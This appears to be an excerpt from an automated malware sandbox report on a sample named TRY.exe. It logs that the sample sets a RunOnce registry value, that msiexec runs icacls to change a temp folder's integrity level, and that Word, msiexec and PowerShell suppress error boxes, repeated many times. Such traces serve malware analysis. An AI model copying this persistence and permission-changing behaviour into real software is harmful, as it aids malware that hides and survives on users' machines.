Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
